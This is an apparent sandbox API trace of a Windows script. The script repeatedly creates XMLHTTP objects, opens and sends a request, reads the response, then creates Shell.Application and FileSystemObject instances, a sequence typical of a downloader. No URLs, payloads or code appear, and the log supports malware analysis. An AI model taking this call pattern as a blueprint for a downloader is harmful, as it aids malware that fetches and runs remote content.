	[0241.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0241.659] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0241.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.660] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0241.660] SysStringLen (param_1=0x0) returned 0x0
	[0241.660] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0241.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0241.660] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0241.660] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0241.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0241.660] ??2@YAPEAX_K@Z () returned 0x62f330
	[0241.660] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0241.660] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0241.660] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0241.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0241.660] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0241.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0241.660] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0241.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.660] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0241.660] SysStringLen (param_1=0x0) returned 0x0
	[0241.660] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0241.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0241.661] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0241.661] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0241.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0241.661] ??2@YAPEAX_K@Z () returned 0x62f310
	[0241.661] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0241.661] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0241.661] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0241.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0241.661] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0241.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0241.661] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0241.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.661] longjmp () 
	[0241.661] longjmp () 
	[0241.661] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0241.661] SysStringLen (param_1=0x0) returned 0x0
	[0241.661] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0241.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0241.661] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0241.661] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0241.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0241.662] ??2@YAPEAX_K@Z () returned 0x62f330
	[0241.662] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f330) 
	[0241.662] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0241.662] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0241.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0241.662] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0241.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0241.662] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0241.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.662] longjmp () 
	[0241.662] longjmp () 
	[0241.662] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0241.662] SysStringLen (param_1=0x0) returned 0x0
	[0241.663] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0241.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0241.663] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0241.663] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0241.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0241.663] ??2@YAPEAX_K@Z () returned 0x62f310
	[0241.663] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0241.663] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0241.663] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0241.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0241.663] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0241.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0241.663] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0241.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0241.664] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0241.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0242.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0242.521] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0242.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0242.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0242.521] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0242.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0242.521] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0242.522] SysStringLen (param_1=0x0) returned 0x0
	[0242.522] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0242.522] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0242.522] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0242.522] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0242.522] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0242.522] ??2@YAPEAX_K@Z () returned 0x62f350
	[0242.522] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0242.522] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0242.522] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0242.522] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0242.522] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0242.522] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0242.522] SysStringLen (param_1=0x0) returned 0x0
	[0242.522] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0242.525] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0242.525] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0242.525] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0242.525] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0242.525] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0242.525] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
